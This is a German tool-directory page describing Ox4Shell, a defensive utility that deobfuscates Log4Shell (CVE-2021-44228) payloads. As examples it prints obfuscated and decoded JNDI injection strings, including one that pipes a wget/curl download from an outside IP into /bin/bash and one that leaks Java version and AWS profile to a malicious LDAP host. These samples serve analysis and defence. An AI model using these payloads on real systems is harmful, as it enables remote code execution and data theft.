Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Ox4Shell — Log4Shell-Payloads mühelos entschleiern. | Kitploit
Tools/GitHubGitHub/ox-eye/ox4shell
SchwachstellenanalyseLog-Analyse
GitHubox-eye/ox4shell

Ox4Shell

Log4Shell-Payloads mühelos entschleiern.

Repository anzeigen
16719vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Logo-HellLogo-Dunkel


maintained-oxeye python-3.8 version-1.1 license-mit blackhat-arsenal

Ox4Shell

Deobfuscate Log4Shell-Payloads mit Leichtigkeit.

Beschreibung

Seit der Veröffentlichung der Log4Shell-Sicherheitslücke (CVE-2021-44228) wurden viele Tools erstellt, um Log4Shell-Payloads zu verschleiern, was das Leben von Sicherheitsingenieuren zu einem Albtraum macht.

Dieses Tool soll die wahren Inhalte verschleierter Log4Shell-Payloads entschlüsseln.

Betrachten Sie zum Beispiel das folgende verschleierte Payload:

root@kitploit:~
${zrch-Q(NGyN-yLkV:-}${j${sm:Eq9QDZ8-xEv54:-ndi}${GLX-MZK13n78y:GW2pQ:-:l}${ckX:2@BH[)]Tmw:a(:-da}${W(d:KSR)ky3:bv78UX2R-5MV:-p:/}/1.${)U:W9y=N:-}${i9yX1[:Z[Ve2=IkT=Z-96:-1.1}${[W*W:[email protected]@-vL7thi26dIeB-HxjP:-.1}:38${Mh:n341x.Xl2L-8rHEeTW*=-lTNkvo:-90/}${sx3-9GTRv:-Cal}c$c${HR-ewA.mQ:g6@jJ:-z}3z${uY)u:7S2)P4ihH:M_S8fanL@AeX-PrW:-]}${S5D4[:qXhUBruo-QMr$1Bd-.=BmV:-}${_wjS:BIY0s:-Y_}p${SBKv-d9$5:-}Wx${Im:ajtV:-}AoL${=6wx-_HRvJK:-P}W${cR.1-lt3$R6R]x7-LomGH90)gAZ:NmYJx:-}h}

Nach dem Ausführen von Ox4Shell würde es sich in eine intuitive und lesbare Form verwandeln:

root@kitploit:~
${jndi:ldap://1.1.1.1:3890/Calc$cz3z]Y_pWxAoLPWh}

Dieses Tool hilft auch dabei, Base64-Befehle zu identifizieren und zu dekodieren. Betrachten Sie zum Beispiel das folgende verschleierte Payload:

root@kitploit:~
${jndi:ldap://1.1.1.1:1389/Basic/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTg1LjI1MC4xNDguMTU3OjgwMDUvYWNjfHxjdXJsIC1vIC0gaHR0cDovLzE4NS4yNTAuMTQ4LjE1Nzo4MDA1L2FjYyl8L2Jpbi9iYXNoIA==}

Nach dem Ausführen von Ox4Shell enthüllt das Tool die Absichten des Angreifers:

root@kitploit:~
${jndi:ldap://1.1.1.1:1389/Basic/(wget -O - http://185.250.148.157:8005/acc||curl -o - http://185.250.148.157:8005/acc)|/bin/bash

⚠️ Wir empfehlen, Ox4Shell mit einer bereitgestellten Datei (-f) anstelle eines Inline-Payloads (-p) auszuführen, da bestimmte Shell-Umgebungen wichtige Zeichen escapen und daher ungenaue Ergebnisse liefern.

Verwendung

Um das Tool auszuführen, einfach:

root@kitploit:~
~/Ox4Shell » python ox4shell.py --help
usage: ox4shell [-h] [-d] [-m MOCK] [--max-depth MAX_DEPTH] [--decode-base64] (-p PAYLOAD | -f FILE)

   ____       _  _   _____ _          _ _ 
  / __ \     | || | / ____| |        | | |
 | |  | |_  _| || || (___ | |__   ___| | |
 | |  | \ \/ /__   _\___ \| '_ \ / _ \ | |
 | |__| |>  <   | | ____) | | | |  __/ | |
  \____//_/\_\  |_||_____/|_| |_|\___|_|_|

Ox4Shell - Deobfuscate Log4Shell payloads with ease.
    Created by https://oxeye.io

General:
  -h, --help            Show this help message and exit
  -d, --debug           Enable debug mode (default: False)
  -m MOCK, --mock MOCK  The location of the mock data JSON file that replaces certain values in the payload (default: mock.json)
  --max-depth MAX_DEPTH
                        The maximum number of iteration to perform on a given payload (default: 150)
  --decode-base64       Payloads containing base64 will be decoded (default: False)

Targets:
  Choose which target payloads to run Ox4Shell on

  -p PAYLOAD, --payload PAYLOAD
                        A single payload to deobfuscate, make sure to escape '$' signs (default: None)
  -f FILE, --file FILE  A file containing payloads delimited by newline (default: None)

Mock-Daten

Die Log4j-Bibliothek verfügt über einige einzigartige Lookup-Funktionen, die es Benutzern ermöglichen, Umgebungsvariablen, Laufzeitinformationen über den Java-Prozess und so weiter nachzuschlagen. Diese Fähigkeit gibt Angreifern die Möglichkeit, nach spezifischen Informationen zu suchen, die den kompromittierten Rechner eindeutig identifizieren können.

Ox4Shell verwendet die Datei mock.json, um gemeinsame Werte in bestimmte Lookup-Funktionen einzufügen. Wenn das Payload beispielsweise den Wert ${env:HOME} enthält, können wir ihn durch einen benutzerdefinierten Mock-Wert ersetzen.

Der standardmäßige Satz von Mock-Daten ist:

root@kitploit:~
{
    "hostname": "ip-127.0.0.1",
    "env": {
        "aws_profile": "staging",
        "user": "ubuntu",
        "pwd": "/opt/",
        "path": "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin"
    },
    "sys": {
        "java.version": "16.0.2",
        "user.name": "ubuntu"
    },
    "java": {
        "version": "Java version 16.0.2",
        "runtime": "OpenJDK Runtime Environment (build 1.8.0_181-b13) from Oracle Corporation",
        "vm": "OpenJDK 64-Bit Server VM (build 25.181-b13, mixed mode)",
        "os": "Linux 5.10.47-linuxkit unknown, architecture: amd64-64",
        "locale": "default locale: en_US, platform encoding: UTF-8",
        "hw": "processors: 1, architecture: amd64-64"
    }
}

Als Beispiel können wir das folgende Payload mit der Mocking-Funktion von Ox4Shell entschleiern:

root@kitploit:~
~/Ox4Shell >> python ox4shell.py -p "\${jndi:ldap://\${sys:java.version}.\${env:AWS_PROFILE}.malicious.server/a}"  
${jndi:ldap://16.0.2.staging.malicious.server/a}

Autoren

  • Daniel Abeles
  • Ron Vider

Lizenz

Der Quellcode des Projekts ist unter der MIT-Lizenz lizenziert, die Sie in der Datei LICENSE finden können.

Tool herunterladen